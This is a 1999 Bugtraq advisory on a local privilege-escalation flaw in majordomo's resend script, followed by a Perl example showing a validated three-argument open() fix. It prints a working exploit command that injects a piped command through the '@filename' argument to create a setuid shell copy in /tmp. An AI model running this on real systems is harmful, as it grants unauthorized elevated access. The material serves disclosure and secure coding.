Bugtraq mailing list archives
majordomo local exploit
From: btellier () USA NET (Brock Tellier)
Date: Tue, 28 Dec 1999 20:47:44 CST
OVERVIEW

A vulnerability in majordomo allows local users to gain elevated privileges.

BACKGROUND

I've only tested the version of majordomo which comes with UnixWare 7.1, which is 1.94.4. This vulnerability may or may not still be present in newer versions of majordomo, but it exists on the default UW7.1 installation.

Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl scripts, as it helped me out in this exploit. Grab it at http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2

DETAILS

The majordomo wrapper allows users to run programs in the /usr/local/majordomo directory with the uid of owner and the gid of daemon. The permissions for wrapper are:

-rwsr-xr-x   1 root     daemon      6464 Jan  4  1999 /usr/local/majordomo/wrapper

but wrapper immediately setuid()'s and setgid()'s to owner:daemon before execing the wrapped program.

A vulnerability in "/usr/local/majordomo/resend" will allow us to execute arbitrary commands with our elevated privileges. The following code snippet appears in resend, a perl script:

-snip-
# If the first argument is "@filename", read the real arguments
# from "filename", and shove them onto the ARGV for later processing
# by &Getopts()
#
if ($ARGV[0] =~ /^\@/) {
    $fn = shift(@ARGV);
    $fn =~ s/^@//;
    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
-snip-

As you can see, if our first argument to resend starts with a "@", resend will attempt to open() the filename. However, open() can also be used to run programs if the first argument to open() begins with a pipe "|". If our first argument is "@|id", resend will run the program "id" with full privileges.

EXPLOIT

Our exploit is simple:

bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec'
resend: must specify '-l list' at /usr/local/majordomo/resend line 77.
bash-2.02$ ls -la /tmp/xnec
-r-sr-sr-x   1 owner    daemon    361688 Dec 29 06:26 /tmp/xnec

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
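The root cause in the quoted snippet is Perl's two-argument open(): when only a filehandle and a string are given, Perl parses the string for a mode, so a leading "|" turns the "filename" into a command to run, a trailing "|" runs it and reads its output, and ">" or ">>" open for writing. The caller who controls $fn therefore controls the operation, not just the file. The following is an added example, not code from the advisory or from majordomo, showing how the same "@filename" feature is written so the name is taken literally: the three-argument form fixes the mode to '<', and the name is validated and confined to a directory before it reaches any system call. The directory /usr/local/majordomo/lists and the function name read_argv_file are illustrative assumptions.

```perl
#!/usr/bin/perl
# Added example (not from the advisory or from majordomo): the "@filename"
# argument-file feature written so that $fn can never choose the open() mode.
# $ARGS_DIR and read_argv_file are illustrative names, not majordomo's own.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempfile);

# Assumption: argument files are only ever read from this directory.
my $ARGS_DIR = '/usr/local/majordomo/lists';

# The pattern the advisory quotes.  With two arguments Perl parses the
# string itself: "|cmd" runs cmd and writes to it, "cmd|" runs cmd and
# reads from it, ">f" / ">>f" write or append, and surrounding blanks are
# stripped.  Whoever supplies $fn picks the operation, not just the file.
#
#     open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
#
# Three-argument open() fixes the mode to '<' and takes $fn literally, so
# "|id" is merely a file named "|id" that does not exist.

sub read_argv_file {
    my ($fn, $dir) = @_;
    $dir //= $ARGS_DIR;

    # Reject anything outside a conservative character set before the name
    # is used anywhere; this covers "|", ";", ">", "<" and whitespace.
    die "invalid argument-file name\n"
        unless defined $fn && $fn =~ m{\A[A-Za-z0-9_./-]+\z};
    # No ".." path components, so the name cannot climb out of $dir.
    die "invalid argument-file name\n" if $fn =~ m{(?:\A|/)\.\.(?:/|\z)};

    # Resolve relative names under $dir and insist the result stays inside it.
    my $path = File::Spec->rel2abs($fn, $dir);
    die "argument file outside $dir\n" unless index($path, "$dir/") == 0;

    # Explicit read-only mode, lexical filehandle, literal path.
    open(my $av, '<', $path) or die "open($path): $!\n";
    my @args;
    while (my $line = <$av>) {
        chomp $line;
        push @args, $line if length $line;
    }
    close $av;
    return @args;
}

# Demonstration on a constructed temporary directory and argument file.
my $dir = File::Temp->newdir();
my ($fh, $file) = tempfile(DIR => "$dir");
print $fh "-l\ntestlist\n";
close $fh;

my @ok = read_argv_file($file, "$dir");
print "accepted: @ok\n";

# Each of these is refused by the validation, never reaching open().
for my $bad ('|id', 'id|', '>/tmp/x', '../../etc/passwd', 'a b') {
    eval { read_argv_file($bad, "$dir") };
    print "rejected '$bad': $@";
}
```

The two changes that matter are the explicit '<' mode (so the string is a path and nothing else) and the allowlist check on the name, which is what a setuid/setgid wrapper should insist on for any caller-supplied argument. Running the script under perl -T (taint mode) is a worthwhile additional layer: it refuses to use unchecked user-derived data in operations such as piped opens, which would have stopped the quoted two-argument call as well.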